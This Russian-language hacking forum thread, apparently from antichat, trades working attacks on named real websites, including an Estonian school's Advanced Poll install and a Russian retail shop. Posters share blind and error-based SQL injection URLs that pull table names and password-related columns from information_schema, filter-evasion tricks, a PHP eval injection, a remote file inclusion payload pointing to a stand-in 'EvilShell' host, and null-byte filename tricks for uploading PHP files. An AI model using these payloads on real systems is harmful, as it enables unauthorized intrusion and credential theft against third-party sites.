Ваши вопросы по уязвимостям.

мор1ров заюзай

http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(substring(version(),1,1)=5,1,(select+1+union+select+2))

 

blind в demo_3.php

Code:

http://www.astangukool.edu.ee/rus/poll/db/demo_3.php?poll_id=4+and+substring(version(),1,1)=5--

Code:

http://www.astangukool.edu.ee/rus/poll/db/misc/info.php

 

Что так,что эдак - ничего не достать)

 

Все прекрасно достается

http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(ascii(substring((select+table_name+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1),1,1))>5,1,(select+1+union+select+2))

Читай статью https://forum.antichat.ru/thread35207.html

 

да да Advanced Poll 2.02
например http://milw0rm.com/exploits/3282

 

Ммм...без ифа никак не обойтись ? Длинная статья...в SIPT-е я так понял так не получится)Тогда чем перебирать ?

 

Грей писал скрипт для работы со слепыми инжектами

 

http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}

 

Если which нету, значит результат будет пустой, поэтому он не покажет есть ли качалки или их нет...

 

http://securityvulns.com/Odocument594.html
http://[target]/poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd=Http://EvilShell
(с) alguidy[at]hotmail[.]com

 

1. Объясните мне, все таки возможно отрубить конец названии файла нулл байтом при:
Content-Type: multipart/form-data

Если да то как это сделать? Правильно ли я это делаю
(этим -> %00 -> не получится отрубить естественно конец при multipart/form-data):
...
filename="thistest.php\x00.jpg"
...

второй вариант который пробывал:
...
filename="thistest.php\0.jpg"
...

2. Если выше перечисл. примеров отрубания конца нулл байтом работают при:
Content-Type: multipart/form-data

То как быть если часть названия файла до бек слеша ("\")
отрубается и считается директорией? Можно ли это обойти и все таки отрубить конец при:
Content-Type: multipart/form-data

Заранее спасибо за ответы

 

подскажите раскручиваемо??

http://www.wearhouse.ru/?page=item&id=125'

???

 

направьте на путь истинный или пример подзапроса

 

http://www.wearhouse.ru/?page=item&id=125+and+ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))>1

свеб агрится на юнион =)

 

херня, в подзапросах используется select, и дело тут не только в селекте.

http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--+

Duplicate column name '5.0.26-lk-log'

 

Каким образом догнать до этого?
софт?
опыт?
SIPT мне не помог(

 

Опыт + анализ

 

я так понимаю чтобы дернуть таблицы из informatiob schema надо будес с подазпросами мутить?

 

http://sql-ex.ru/help/

 

http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1),14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+

Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html